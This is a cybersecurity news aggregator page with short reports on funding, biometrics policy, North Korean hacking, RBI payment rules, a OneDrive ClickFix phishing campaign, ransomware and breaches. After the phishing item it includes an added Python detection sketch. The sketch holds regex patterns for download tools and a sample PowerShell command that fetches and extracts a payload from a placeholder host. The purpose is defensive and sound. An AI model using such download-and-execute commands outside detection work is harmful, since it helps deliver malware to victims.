Cyber security aggregate rss news

Cyber security aggregator - feeds history


 Firewall Daily

Cybersecurity startup WhizHack has announced a successful Pre-Series A funding round, securing $3 million in funding and bringing its valuation to over $100 million. The investment was led by SAAA Capital, a prominent investment firm based in Singapore that has been a key supporter of WhizHack's journey.

Founded in November 2020, WhizHack has swiftly established itself as a pioneering force in the cybersecurity industry. The company has achieved remarkable growth, expanding its operations by over 200% annually and increasing shareholder value by more than 50 times within just three years. The Pre-Series A round highlights the company's innovative approach to providing cybersecurity solutions.

WhizHack Pre-Series A Funding Round Raises $3 Million at Over $100 Million Valuation

WhizHack's Pre-Series A funding round marks a critical milestone for the company, setting the stage for further expansion and development. The funds will enhance its research and development efforts, particularly through collaborations with top universities in the USA and India. This strategic investment aligns with WhizHack's ambitious plans to raise a Series A round in early 2025, with some of the world's largest private equity firms already indicating their interest.

The company's growth has been strongly supported by SAAA Capital, which has been involved with WhizHack since its early days. SAAA Capital, known for its focus on emerging technology companies, has played a crucial role in the company's success. Alongside SAAA Capital, other early investors in WhizHack include Rising Star from the Netherlands and Rahul Chawla, Managing Director at Deutsche Bank in India.

Founded by three industry veterans with a collective experience of over 100 years in managing global deep-tech businesses and startups, WhizHack operates through three main divisions: the development of proprietary security products, global managed security services, and scalable security training designed to empower both enterprises and government entities.

Key Takeaways from the WhizHack Pre-Series A Funding Round

One of WhizHack's standout innovations is its ZeroHack platform, designed to detect and mitigate advanced cyber-attacks on operational technology (OT) and information technology (IT) networks. The platform is recognized for its unparalleled speed, accuracy, and cost-effectiveness, and is currently used by major institutions across South East Asia, the Middle East, and Africa, including critical infrastructure, defense, and educational institutions.

In the past year, WhizHack has made significant strides in securing high-profile clients from various sectors, including banking, manufacturing, FMCG, airports, power system operation centers (SOCs), and state governments. The company has successfully competed against some of the most renowned global cybersecurity players, demonstrating its competitive edge in the industry. With the increasing threat of cyber terrorism, particularly from state actors, WhizHack is concentrating on advancing its OT security products for cyber-physical systems (CPS), a niche with few global competitors.

Kallol Sil, Co-founder and CEO of WhizHack, expressed his appreciation for SAAA Capital's continued support, stating, "We value SAAA Capital's trust and commitment to our vision. The new capital will enable us to accelerate our R&D initiatives and strengthen our collaborations with leading universities. We are excited about our upcoming Series A round and the opportunity to expand into North America and Europe, with several major private equity firms showing interest."

Ashish Patil, Managing Director of SAAA Capital, also praised WhizHack's progress, saying, "We are proud to have partnered with WhizHack and witnessed their exceptional growth. The company's in-house developed suite of cybersecurity products and services competes at the highest level.


 Cybersecurity News

The U.S. Customs and Border Protection (CBP) agency has released a guide detailing how travelers can opt out of biometric facial recognition technology at airports and other ports of entry. The guide was released as the agency continues to expand its use of facial comparison systems for identity verification at airports and seaports across America, while also addressing privacy concerns raised by some lawmakers and civil liberties groups.

U.S. Customs and Border Protection Facial Biometrics

The CBP has implemented facial biometrics at all international airports for entry processes, known as Simplified Arrival, and at 53 airport locations for exit procedures. The technology has also been expanded to 39 seaports and all pedestrian lanes at both Southwest and Northern Border ports of entry.

(Image source: https://www.cbp.gov/travel/biometrics)

Earlier, Diane J. Sabatino, Acting Executive Assistant Commissioner, Office of Field Operations, of the U.S. Customs and Border Protection stated, "CBP is excited to expand the use of facial biometrics through public/private partnerships to further secure and enhance travel while protecting the privacy of all travelers."

(Image source: https://www.cbp.gov/travel/biometrics)

According to CBP, the use of facial biometric comparison technology has allowed the agency to process more than 540 million travelers and prevent over 2,000 impostors from entering the U.S. The agency touts the technology as a way to make existing travel requirements more efficient, creating a more seamless, secure, and safer experience for travelers. The implementation of biometric technology stems from the 9/11 Commission Report that authorized the U.S. Government to use an automated system to record the arrivals and departures of visitors at all air, sea and land ports of entry. As technologies have evolved, facial comparison has proven to be one of the most effective solutions.

Opt-Out Provisions and Privacy Concerns

Despite the benefits, CBP acknowledges that some U.S. citizens may not wish to participate in facial photo capture. The agency stresses that its traveler identity verification process is not a surveillance program, with cameras and signage clearly visible to inform passengers about the technology. CBP also states that it adheres to all applicable privacy rules and regulations, retaining U.S. citizen photos for no more than 12 hours after identity verification. On the TSA website's FAQ, in response to the question of whether the facial processing is necessary for all passengers, it states, "No. Participation in the testing of biometric technology is voluntary. Passengers may notify a TSA officer if they do not wish to participate and instead go through the standard ID verification process."

What Does the Guide Entail?

The guide outlines the process for travelers who do not wish to participate in the biometric facial comparison technology. According to the guide, U.S. citizens who do not wish to submit to facial photo capture can request alternative processing, which typically involves a manual review of their travel documents by a CBP officer. This option is available for both domestic and international travelers.


 Cyber Warfare

North Korea's cyber capabilities are expanding at an alarming rate, posing a significant threat to global security. Local media in South Korea, citing a recent intelligence report, confirmed that the reclusive nation has bolstered its cyber workforce by 20% in just two years, bringing the total number of hackers to a staggering 8,400. This number stood at 6,800 personnel, as per the Defense Whitepaper 2022. This rapid growth, fueled by economic desperation and Kim Jong Un's strategic vision, has transformed cyber warfare into a cornerstone of the regime's ambitions.

North Korea's 'Hacker University'

The Reconnaissance General Bureau, the regime's intelligence arm, is at the heart of this cyber expansion. Operating under the direct supervision of Kim Jong Un, the bureau has established a "hacker university" to cultivate a new generation of cyber talent. By relaxing strict social hierarchies, North Korea has opened up opportunities for individuals from all walks of life to join the program, creating a deep pool of potential recruits. Kim Jong Un reportedly instructed that background should not be considered when training hackers and that only talented individuals should be selected. In North Korea, social status, such as residence and occupation, is usually strictly determined by bloodline, but he declared that exceptions would be made only for those who join the hacking training program. Pyongyang's leadership is on the lookout for young math and computer talents to lead them down the path of cybercrime.

The regime's motivation is clear: financial gain. With international sanctions crippling the North Korean economy, cybercrime has emerged as a critical revenue stream. Hacking groups such as Lazarus and Kimsuky, linked to the Reconnaissance General Bureau, have become notorious for their audacious attacks, targeting everything from cryptocurrency exchanges to government agencies. The proceeds from these cyberheists are funneled directly into the regime's nuclear and missile programs. A senior intelligence source, referring to the amount of money that hacking can bring, assessed that "the North Korean leadership has high expectations [from these hackers]."

Developing Malware with Russia?

The burgeoning partnership between North Korea and Russia is another cause for serious concern. The recent signing of a comprehensive strategic partnership treaty, which includes provisions for cooperation in information and communications technology security, suggests a formal framework for cyber collaboration. The intelligence authorities believe that the two have already laid the foundation for joint research and mutual education on hacking technology through this treaty. A government source said, "It appears that North Korea and Russia are jointly developing or sharing core malware used in hacking." This alliance could lead to a dangerous exchange of expertise and resources, potentially elevating the threat level posed by both nations.

Experts warn that North Korea's cyber tactics are becoming increasingly sophisticated and aggressive. The regime is no longer content with targeting specific, high-value targets. Instead, it is adopting a broader, more indiscriminate approach, casting a wider net in search of vulnerable systems. This shift in strategy, coupled with the rapid growth of its cyber workforce, makes North Korea a formidable and unpredictable adversary in the digital realm. As North Korea continues to invest heavily in its cyber capabilities, the international community must remain vigilant. Developing robust cybersecurity defenses, sharing intelligence, and imposing stricter sanctions on the regime are essential steps in mitigating this growing threat.


 Cybersecurity News

Reserve Bank of India (RBI), the country's apex financial institution, has issued new directions to bolster the cybersecurity and resilience of the digital payment ecosystem in India. On July 30, the apex bank issued 'Master Directions on Cyber Resilience and Digital Payment Security Controls for non-bank Payment System Operators (PSOs)'. "These directions aim to enhance the safety and security of payment systems operated by PSOs, establishing a robust framework for overall information security preparedness with a particular focus on cyber resilience," RBI said in its notification.

Applicability of Digital Payment Security Norms

The new directives apply to all authorized non-bank PSOs and their associated unregulated entities, including payment gateways, third-party service providers, and vendors. The PSOs are required to ensure that these entities adhere to the directions through mutual agreements and organizational policies approved by their boards. RBI said the approach is designed to effectively identify, monitor, control, and manage cyber and technology-related risks arising from the integration of various entities within the digital payments ecosystem.

Digital Payment Security Measures and Controls

The RBI's directions mandate PSOs to facilitate mechanisms for online alerts based on parameters such as failed transactions, transaction velocity, excessive activity, geo-location, IP address origin, and behavioral biometrics. These measures aim to detect and prevent fraudulent activities and enhance transaction security. When sending alerts via SMS, email, or other notifications, PSOs and their participants must ensure that sensitive information, such as bank account and card numbers, is redacted or masked. Online payment transactions must clearly display the merchant's name and transaction amount, while OTP-based authentication messages should include the OTP at the end and refer to the specific transaction, RBI said in its master directions. Furthermore, PSOs must provide facilities on their mobile applications or websites that allow customers to identify and report fraudulent transactions instantly. This feature ensures seamless and immediate notification to the issuer of the payment instrument.

Mobile Payment Security Practices

PSOs offering mobile payment services are required to implement stringent security practices and risk mitigation measures. These include ensuring that mobile applications are free from anomalies, maintaining authenticated sessions with robust encryption protocols, and implementing device binding or fingerprinting for mobile applications. PSOs must also ensure that online sessions are terminated after a period of inactivity and that customers are promptly notified of failed login or authentication attempts, as per the new directions. Additionally, RBI added that PSOs must establish control mechanisms to detect the presence of remote access applications and prohibit access to mobile payment applications while remote access is active.

Card Payment Security Measures

For card payments, PSOs must ensure that terminals installed at merchant locations for capturing card details are validated against the PCI-P2PE (Payment Card Industry-Point to Point Encryption) program. POS terminals with PIN entry for card payments must be approved by the PCI-PTS (Payment Card Industry-PIN Transaction Security) program, ensuring that they meet the highest security standards, RBI said.

Governance and Cyber Security Preparedness

The governance of information security risks, including cyber risk and cyber resilience, lies with the Board of Directors of the PSO. A sub-committee of the Board, headed by a member with expertise in information and cyber security, may be delegated primary oversight responsibilities, said the new guidelines. This sub-committee is required to meet at least once every quarter to review and manage these risks. Further, RBI said that PSOs must formulate a Board-approved Information Security (IS) policy to manage potential information security risks across all applications and products related to payment systems. This policy must be reviewed annually and cover various aspects, including roles and responsibilities, measures to identify and manage cyber security risks, and processes for training and awareness.

A distinct Board-approved Cyber Crisis Management Plan (CCMP) must be prepared by PSOs to detect, contain, respond to, and recover from cyber threats and attacks, RBI said. Additionally, PSOs are required to implement a comprehensive data leak prevention policy to ensure the confidentiality, integrity, and availability of business and customer information. This includes securing data both in transit and at rest, adhering to PCI-DSS guidelines, and regularly testing backup data to ensure recovery without loss of transactions or audit trails. The RBI also emphasized the importance of business continuity planning (BCP), directing PSOs to develop a BCP based on various cyber threat scenarios, including extreme but plausible events. The plan should be reviewed annually and include detailed incident response, resumption, and recovery procedures to manage cybersecurity events or incidents, said RBI.

Implementation Timeline

The new directions will take effect from April 2025 for large non-bank PSOs, April 2026 for medium non-bank PSOs, and April 2028 for small non-bank PSOs. Entities such as CCIL, NPCI, Payment Aggregators, TReDS, and large PPI issuers are classified as large non-bank PSOs, while cross-border Money Transfer Operators (MTSS) and medium PPI issuers are categorized as medium non-bank PSOs. Small PPI issuers and Instant Money Transfer Operators are considered small non-bank PSOs.


 Cybersecurity News

A new phishing campaign targeting Microsoft OneDrive users has been observed, employing social engineering tactics to trick victims into executing malicious PowerShell scripts. The campaign exploits users' urgency to access files and their trust in legitimate-seeming software interfaces.

OneDrive Phishing Campaign Attack Sequence

Researchers from Trellix observed that the campaign begins with an email containing an .html file, which, when opened, displays an image designed to create a sense of urgency about accessing a document. The image simulates a Microsoft OneDrive page displaying a file named "Reports.pdf" and a window titled "Error 0x8004de86" with an error message claiming that the "OneDrive" cloud service needs to be updated. Two buttons, "Details" and "How to fix," are presented, with the latter triggering a function call and loading secondary instructions. This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user's emotions and prompt hasty action.

(Image source: https://www.trellix.com/)

The attack sequence unfolds as follows: the user is instructed to click on a button that purportedly explains how to fix a DNS issue, in the process compromising their system. The user is then asked to open the Quick Link menu, access the Windows PowerShell terminal and paste the malicious commands for execution as a supposed measure for implementing the OneDrive cloud service update. The command downloads an archive file, extracts its contents, and executes a script using AutoIt3.exe. Ultimately, the attack displays a success message, claiming that the operation has been completed.

Global Reach and Enterprise Implications

The campaign has affected users worldwide, with significant activity detected in the United States, India, and the United Kingdom. For businesses, this attack poses a serious threat. A single compromised employee could potentially lead to widespread network infiltration, data breaches, and financial losses.

(Image source: https://www.trellix.com/)

To combat such attacks, organizations must:
- Implement robust employee training programs focused on recognizing phishing attempts.
- Enforce strict security protocols, including email filtering and attachment scanning.
- Regularly update and patch systems to close potential vulnerabilities.
- Foster a culture of cybersecurity awareness throughout the organization.

Campaigns of this nature, which attempt to trick users into executing malicious PowerShell scripts and often deliver malware such as remote access Trojans (RATs) and infostealers such as DarkGate, Lumma and Vidar, have commonly been dubbed 'ClickFix' attacks or 'ClearFake' by security researchers.
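As a defender-side illustration of the chain Trellix describes (PowerShell opened interactively by the user, a download, an archive extraction, and an AutoIt3.exe child), here is an added detection sketch; it is not code from the article or from Trellix. The event field names, the sample events and the placeholder URL are all constructed assumptions, loosely modelled on Sysmon process-creation and PowerShell script-block logging.

```python
"""Score PowerShell processes for the ClickFix-style chain described above.

Constructed, simplified telemetry (field names are an assumption): process-creation
records with parent/child links, plus script-block text correlated by process id.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-case executable basename
    cmdline: str


@dataclass
class ScriptBlock:
    pid: int        # PowerShell process that ran the block (assumed available)
    text: str       # ScriptBlockText


# Coarse indicators for the stages named in the article: download, extract, AutoIt.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b", re.I)
EXTRACT_RE = re.compile(r"expand-archive|extracttodirectory|\btar\b.*-x", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # PowerShell opened from the Quick Link / Start menu


def analyse(procs, blocks, threshold=3):
    """Return [(pid, reasons)] for PowerShell processes matching >= threshold stages."""
    by_pid = {p.pid: p for p in procs}
    children = {}
    for p in procs:
        children.setdefault(p.ppid, []).append(p)
    # A pasted command never appears on the process command line, so join the
    # script-block text to what the process was started with.
    text_by_pid = {}
    for b in blocks:
        text_by_pid[b.pid] = text_by_pid.get(b.pid, "") + "\n" + b.text

    alerts = []
    for p in procs:
        if p.image not in POWERSHELL:
            continue
        reasons = []
        parent = by_pid.get(p.ppid)
        if parent and parent.image in INTERACTIVE_PARENTS:
            reasons.append("interactive PowerShell started from " + parent.image)
        executed = p.cmdline + text_by_pid.get(p.pid, "")
        if DOWNLOAD_RE.search(executed):
            reasons.append("downloads content")
        if EXTRACT_RE.search(executed):
            reasons.append("extracts an archive")
        if any(c.image == "autoit3.exe" for c in children.get(p.pid, [])):
            reasons.append("spawns AutoIt3.exe")
        if len(reasons) >= threshold:
            alerts.append((p.pid, reasons))
    return alerts


# Constructed sample telemetry: one victim session and one benign scheduled task.
SAMPLE_PROCS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # Victim opens PowerShell by hand; the command line is bare because the payload is pasted.
    ProcEvent(200, 100, "powershell.exe", "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""),
    ProcEvent(300, 200, "autoit3.exe", "AutoIt3.exe C:\\Users\\u\\AppData\\Local\\Temp\\x\\script.a3x"),
    ProcEvent(50, 1, "svchost.exe", "svchost.exe -k netsvcs -p -s Schedule"),
    # Benign: Task Scheduler runs an admin script that only downloads a report.
    ProcEvent(400, 50, "powershell.exe", "powershell.exe -File C:\\Scripts\\pull-report.ps1"),
]
SAMPLE_BLOCKS = [
    ScriptBlock(200, "Invoke-WebRequest -Uri hxxp://PLACEHOLDER.invalid/update.zip -OutFile $env:TEMP\\u.zip; "
                     "Expand-Archive $env:TEMP\\u.zip $env:TEMP\\x"),
    ScriptBlock(400, "Invoke-WebRequest -Uri https://reports.example.internal/daily.csv -OutFile C:\\Reports\\daily.csv"),
]


def run_sample():
    """Analyse the constructed telemetry; only pid 200 should trip the rule."""
    return analyse(SAMPLE_PROCS, SAMPLE_BLOCKS)


if __name__ == "__main__":
    for pid, reasons in run_sample():
        print(f"ALERT pid={pid}: " + "; ".join(reasons))
```

Because the victim pastes the command into an already-open console, the process command line carries none of the indicators; correlating script-block text by process id is what makes the download and extraction stages visible to the rule.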


 Ransomware News

A ransomware attack is impacting the software system of OneBlood, a blood donation non-profit that serves hundreds of hospitals in the southeastern U.S. "Our team reacted quickly to assess our systems and began an investigation to confirm the full nature and scope of the event. Our comprehensive response efforts are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible," said Susan Forbes, OneBlood senior vice president of corporate communications and public relations.

OneBlood Reverts to Manual Processes

OneBlood said it continues to collect, test and distribute blood, but its operations are at "a significantly reduced capacity." The non-profit has implemented manual processes and procedures as a business continuity plan and to remain operational. But these processes take significantly longer to perform and impact inventory availability. "In an effort to further manage the blood supply we have asked the more than 250 hospitals we serve to activate their critical blood shortage protocols and to remain in that status for the time being," said Forbes.

The national blood community is assisting OneBlood and the hospitals and patients it serves to manage the flow of supplies. Blood centers across the country are also lending a helping hand by sending blood and platelets to OneBlood. The AABB Disaster Task Force is coordinating national resources to assist with additional blood products being sent to OneBlood. OneBlood said that all blood types are needed, but there is a more urgent requirement for O Positive, O Negative and Platelet donations at the moment, as these are universal donor groups and are medically considered safe for all patients. "The blood supply cannot be taken for granted. The situation we are dealing with is ongoing. If you are eligible to donate, we urge you to please make an appointment to donate as soon as possible," Forbes said.

Similar to Ransomware Attack on NHS England

A similar ransomware incident impacted two major London hospitals in June, disrupting their blood sampling operations and reducing testing volume by 96%. The two hospitals are still reeling from the aftermath of the ransomware attack by Russian Qilin ransomware actors nearly two months later, with thousands of surgeries and emergency operations postponed or shifted to other facilities. As in the case of OneBlood, the NHS at the time made a similar O blood group donation request, as the attack significantly disrupted the hospitals' ability to match patients' blood types. It is not clear if the two attacks are linked.

Editor's Note: This is an evolving situation and the article will be updated with any additional information.


 Firewall Daily

Days after Microsoft experienced a major global outage that disrupted its services, the company is grappling with another setback as a cyberattack has caused nearly ten hours of service disruption. The Microsoft cyberattack has disrupted several services, including the popular email platform Outlook and the widely played video game Minecraft, according to a company disclosure. Preliminary findings indicated that a Distributed Denial-of-Service (DDoS) attack had initially triggered the outage, but an error in Microsoft's defensive measures exacerbated the situation.

The cyberattack on Microsoft began on July 30, 2024, and led to widespread issues across various Microsoft services. According to a statement from the company, "While the initial trigger event was a Distributed Denial-of-Service (DDoS) attack... initial investigations suggest that an error in the implementation of our defenses amplified the impact of the attack rather than mitigating it." DDoS attacks are known for overwhelming websites or online services with excessive traffic to render them inoperable.

Response and Mitigation Against Microsoft Cyberattack

Microsoft's response included a fix that reportedly showed signs of improvement, but the company continued to monitor the situation to ensure a full recovery. In a public apology on X (formerly Twitter), Microsoft acknowledged the inconvenience caused to users and stated, "We're sorry to hear you're running into issues with our services. Our experts are currently investigating the situation in order to resolve it as soon as possible. You can find updates here: https://msft.it/6017ljML3. We sincerely apologize for the inconvenience."

(Image source: Microsoft)

The impact of the Microsoft cyberattack extended beyond its own products. Services dependent on Microsoft's platforms were also affected. For instance, Cambridge Water reported issues with their website and services due to the outage. They explained, "Due to worldwide issues with Microsoft Azure, a problem with our website is affecting several services including MyAccount and PayNow."

(Image source: Cambridge Water)

Other organizations felt the ripple effects as well. The HM Courts and Tribunals Service, which oversees the administration of various courts and tribunals in England and Wales, noted problems with multiple online services. Financial institutions like NatWest also experienced disruptions, with a bank spokesperson commenting, "We are aware that some customers experienced difficulties accessing our webpages today. This was linked to the issues reported by Microsoft Azure which has affected some Microsoft services globally." The timing of the cyberattack on Microsoft was particularly inconvenient for FC Twente, a top Dutch football team, which saw its ticketing website and club app become inaccessible to fans. The outage came just hours before Microsoft was scheduled to release its latest financial update, adding to the company's challenges.

The Stages of Microsoft Cyberattack and Linked Outages

The recent Microsoft outage followed a series of earlier disruptions affecting Microsoft's Azure cloud platform. In July, several incidents highlighted the platform's vulnerabilities. On July 30, between 11:45 UTC and 19:43 UTC, an unexpected surge in traffic from a DDoS attack led to the Azure Front Door outage. The attack's effects were exacerbated by an error in Microsoft's defensive measures, though the company implemented networking changes and failovers to resolve the issue by 20:48 UTC. Earlier, on July 19, Windows virtual machines suffered startup failures due to a problematic update from CrowdStrike's Falcon agent, which caused continuous restart loops until recovery instructions were published. Additionally, from 21:40 UTC on July 18 to 02:55 UTC on July 19, Azure Storage experienced disruptions in the Central US region due to incomplete updates to virtual machine host address lists, with recovery efforts involving halting the update process and executing failovers, achieving full restoration by the early hours of July 19.

These incidents have led Microsoft to reassess and improve its systems. To mitigate future risks, the company has outlined several measures. Completed improvements include fixing storage to allow list-generation workflows, enhancing failover policies for SQL databases, and refining fail-back workflows for Cosmos DB. Upcoming improvements are set to address various aspects of service resilience, such as implementing VM health checks and refining failover workflows.

Professor Alan Woodward, a noted computer security expert, commented on the situation, "It seems slightly surreal that we're experiencing another serious outage of online services from Microsoft. You'd expect Microsoft's network infrastructure to be bomb-proof", reported BBC. This sentiment highlights the surprise and concern within the tech community regarding the repeated issues faced by one of the industry's leading companies.

Microsoft's Azure cloud platform has been a key driver of the company's profitability in recent years. However, recent disruptions have rattled investors. Following the outage, Microsoft's shares dropped by 2.7% in after-hours trading. Despite reporting a 15% increase in overall revenue to $64.7 billion and an 11% rise in profit to $22 billion for the April-June period, the company has faced scrutiny due to these service interruptions. For users and businesses relying on Microsoft's services, the company advises configuring Azure Service Health alerts to stay informed about service issues and implementing disaster recovery strategies to minimize the impact of future outages.


 Cybersecurity News

In a follow-up to the May 2024 announcement regarding a Western Sydney University data breach of its Microsoft Office 365 environment, WSU has now confirmed that personal information stored in its Isilon storage platform was also subjected to unauthorized access. This platform holds 'My Documents' information, departmental shared folders, and some backup and archived data. In an official statement, the University noted, "We have been and will continue to analyze the very large and complex dataset to properly understand the impact the unauthorized access to Isilon has had on individuals' personal information."

Western Sydney University Data Breach: Key Findings

The University has confirmed the following details regarding the Western Sydney University data breach:

Scope of Access: Evidence shows that approximately 580 terabytes of data across 83 out of 400 directories in Isilon were accessed.

Timeline: Unauthorized access to Isilon occurred between 9 July 2023 and 16 March 2024.

Data Compromised: The initial review has found that personally identifiable information (PII) was accessed, including names, contact details, dates of birth, health information, sensitive workplace conduct and health and safety matters, government identification documents, tax file numbers, superannuation details, and bank account information.

Extent of WSU Data Breach: Based on the forensic investigation to date, there is no evidence that this incident extends beyond the University's Microsoft Office 365 and Isilon environments.

Current Situation

The University has not received any threats to disclose private information or demands in exchange for maintaining privacy. Furthermore, dark web monitoring has revealed no evidence that the data has been uploaded. No further unauthorized access to Isilon has been detected since remediation efforts took place. The University continues to work with authorities to investigate the perpetrator of the Isilon incident. Since the initial discovery of unauthorized access to its IT network in January 2024, the University has been conducting forensic investigations to determine the full nature, scope, and scale of the incident. This public notification, issued on 31 July 2024, aims to inform the University community, including former and current students and staff, about the unauthorized access to the Isilon storage platform.

University's Response and Actions

Western Sydney University has been proactive in addressing the breach. The University has engaged Australia's leading digital forensics and incident response team, CyberCX, and relevant authorities, including:
- National Office of Cyber Security
- Office of the Australian Information Commissioner
- NSW Information and Privacy Commission (IPC)
- Australian Federal Police
- Australian Cyber Security Centre
- Australian Signals Directorate
- Home Affairs
- NSW Police Force's Cybercrime Squad under Strike Force GIRRAKOOL

To protect its community, the University secured an interim injunction from the NSW Supreme Court to prevent access, use, transmission, and publication of any data that was accessed without authorization. The University's leadership and Board have implemented several measures to mitigate the issue and enhance protection, including:
- Completing a password reset
- Enhancing detection monitoring
- Implementing additional firewall protection
- Increasing the cyber security team capacity
- Reviewing data storage and retention practices

On 31 July 2024, the University communicated directly with its community through emails to students, staff, and alumni, providing information on protective steps and available support services.

Next Steps

The University will continue to notify individuals about the impact on their personal information in the coming weeks. Due to the volume and complexity of the data, individual notifications may not be possible for all those affected. The public notification aims to keep the community vigilant for any signs that their data may have been accessed. The University has engaged IDCARE, Australia's national identity and cyber support service, to offer free advice and support to those concerned about protecting themselves from identity theft. For more information on protecting personal information, visit IDCARE or call 1800 595 160, quoting reference number WESSYDPB24. An online Get Help form is also available. The University has established a dedicated phone line for additional support and inquiries: 02 9174 6942 (Monday to Friday, 9.00am to 4.30pm AEST).

Western Sydney University remains committed to rectifying this matter transparently and keeping the community informed as the investigation progresses. The University unreservedly apologizes for the incident and its impact on the community.

image for Securonix Appoints K ...

 Appointments

Securonix, Inc., a leader in Security Information and Event Management (SIEM) and a five-time Gartner Magic Quadrant Cybersecurity leader, has announced the appointment of Kash Shaikh as its new President and Chief Executive Officer, effective immediately. In addition to his executive role, Shaikh will also join the
company’s Board of Directors. Kash Shaikh brings over 30 years of experience in business transformation and delivering innovative technology solutions to global enterprise organizations. His most recent role was as President and CEO of Virtana, a leading provider of hybrid-cloud infrastructure observability solutions. Kash Shaikh: An Experienced Leader Takes the Helm Prior to Virtana, Shaikh served as Global Vice President and General Manager for Dell’s Enterprise Solutions Unit. He has also held key leadership and executive positions at Ruckus Wireless, Hewlett Packard, Cisco, and Nortel Networks. “I am honored to join Securonix, a pioneer in the cybersecurity industry and a five-time leader in the Gartner Magic Quadrant for SIEM. With its best-in-class, innovative unified platform offering SIEM, SOAR, and UEBA, Securonix is at a pivotal moment for both the company and the industry,” said Shaikh. “As the chosen SIEM provider by 1,000 of the world’s largest and most respected enterprise customers, Securonix is well-positioned for its next phase of profitable growth. The company’s success relies on continuous innovation and strong relationships with customers and partners. I am excited to bring my customer-centric approach and servant leadership to achieve our mission of securing the world by staying ahead of cyber threats.” Nadeem Syed, Senior Managing Director and Head of Value Creation at Vista Equity Partners and Securonix board member, expressed his confidence in Shaikh’s leadership. “Kash is a veteran, customer-focused technology executive with extensive experience leading and scaling businesses providing mission-critical software products to enterprise customers around the world. We look forward to working closely with Kash and the entire Securonix team during this exciting next phase of accelerated profitable growth.” A Transition in Leadership Kash Shaikh succeeds Nayaki Nayyar, who has decided to step down to focus on public Board service. 
During her tenure, Nayyar led the company on a path toward profitable growth and further advanced its strong legacy of innovation by introducing the Unified Defense SIEM and Securonix EON – AI-Reinforced CyberOps Platform. The company's unified platform, which includes SIEM, Security Orchestration, Automation, and Response (SOAR), and User and Entity Behavior Analytics (UEBA), is recognized for its advanced capabilities. The company’s continuous innovation in integrating AI across all layers of its platform positions it as a leader in the cybersecurity industry. As the organization embarks on this new chapter under the leadership of Kash Shaikh, the company is poised for significant growth and innovation. With a strong focus on customer-centric solutions and a commitment to advancing its technology, Securonix aims to maintain its leadership in the cybersecurity industry and continue providing top-tier protection against evolving cyber threats.

image for Justice Department A ...

 Cybersecurity News

The U.S. Department of Justice filed an appeal challenging the light sentencing of Conor Fitzpatrick, popularly known in the cybercriminal underworld as "Pompompurin." Fitzpatrick had received only 17 days of time served for charges related to the operation of BreachForums and possession of child pornography
content on his personal devices. Prosecutors argue the sentence was unreasonably light given the severity of Fitzpatrick's crimes and his violation of pretrial release conditions. The district court judge cited Fitzpatrick's mental health issues as a key factor for its lenient sentencing. Conor Fitzpatrick Mental Diagnosis vs. Crime Severity The DOJ contends the judge placed excessive weight on Fitzpatrick's mental health, neglecting other crucial sentencing factors. Prosecutors argue that while Fitzpatrick's condition should be considered, it shouldn't overshadow the seriousness of his offenses or negate the need for deterrence and public protection. The appeal cites the earlier case of United States v. Zuk, where a sentence was vacated due to supposed overemphasis on the defendant's autism diagnosis. The DOJ claims Fitzpatrick's case goes further than the previous case, with the judge making unsupported assumptions about Fitzpatrick's personal ability to cope with prison life and the belief that he would not receive adequate mental health treatment in prison. The DOJ felt Fitzpatrick had demonstrated awareness of his actions' illegality, citing his activities in helping forum members evade law enforcement, manage his own online criminal activities including the brokering of hundreds of thousands of dollars' worth of deals, despite his diagnosis. The opening brief by the DOJ stated: "There is also no question that Fitzpatrick knew what he was doing was wrong. He even helped one BreachForums member who feared law enforcement scrutiny delete his or her IP address from the site. 
(JA129) He promised another user that he would falsify registration information should law enforcement ever request it, jokingly stating that he “doubt[ed] law enforcement would even bother making legal requests to a hacking forum lmao[.]" The following points are mentioned in the table of contents as arguments against the reasoning of the sentence: Image: Dissent Doe (DataBreaches.net). Implications and Public Message The prosecution raised concerns about the broader implications of such a lenient sentence. They argue it fails to deter similar crimes, undermines respect for the law, and creates significant sentencing disparities. The prosecution points out several inconsistencies and unsupported conclusions in the district court's decision which they believe do not hold up to scrutiny and reality. The appeal against the sentencing raises important questions about the impact of Fitzpatrick's sentence on the public and the justice system. The Justice Department's appeal seeks to ensure that Fitzpatrick's sentence is revised to reflect the seriousness of his crimes and to maintain public trust in the justice system, stressing the need to deliver the right message to other individuals engaging in similar crimes as well as to victims of child pornography and fraud.

image for Ransomware Payments  ...

 Firewall Daily

Ransomware payments have reached a new milestone, with many hacker groups claiming ransom sums never seen before. According to a recent ransomware report, a single company recently paid a ransom of $75 million, highlighting the dramatic rise in financial demands. This increase in ransom
amounts reflects a broader trend of escalating financial demands. In 2023, total ransomware payments exceeded $1 billion, emphasizing the severe economic impact of these cyber threats. Ransomware attacks have become more frequent and severe, with the report indicating a 17.8% increase in blocked ransomware attempts and a 57.8% rise in attacks identified through data leak sites. The manufacturing, healthcare, and technology sectors have been particularly targeted, with the manufacturing industry bearing the brunt of these attacks. Analyzing the 2024 Ransomware Report The sophistication of ransomware tactics has reached new heights. The ThreatLabz 2024 ransomware report observes a disturbing trend where attackers are not only targeting organizations but also their executives' families to demand higher ransoms. This shift highlights a broader and more dangerous approach to ransomware, where no sector, whether large corporations or small to medium-sized enterprises, is immune. Operations like "Operation Endgame" and "Operation Duck Hunt" have been pivotal in disrupting ransomware activities. Despite these efforts, prominent ransomware groups continue to evolve and evade capture, often operating with relative impunity. The resilience and adaptability of these groups pose ongoing challenges for law enforcement. The report details several critical findings from April 2023 to April 2024. Among them is the emergence of 19 new ransomware families, bringing the total number to 391. The most active families during this period include LockBit, BlackCat (also known as ALPHV), and 8Base, with LockBit leading the pack with 22.1% of attacks. Software and system vulnerabilities remain a primary vector for ransomware attacks, highlighting the necessity for prompt patching and robust zero-trust architecture. Additionally, voice-based social engineering has become a notable method for gaining access to corporate networks, as evidenced by groups like Scattered Spider and Qakbot. 
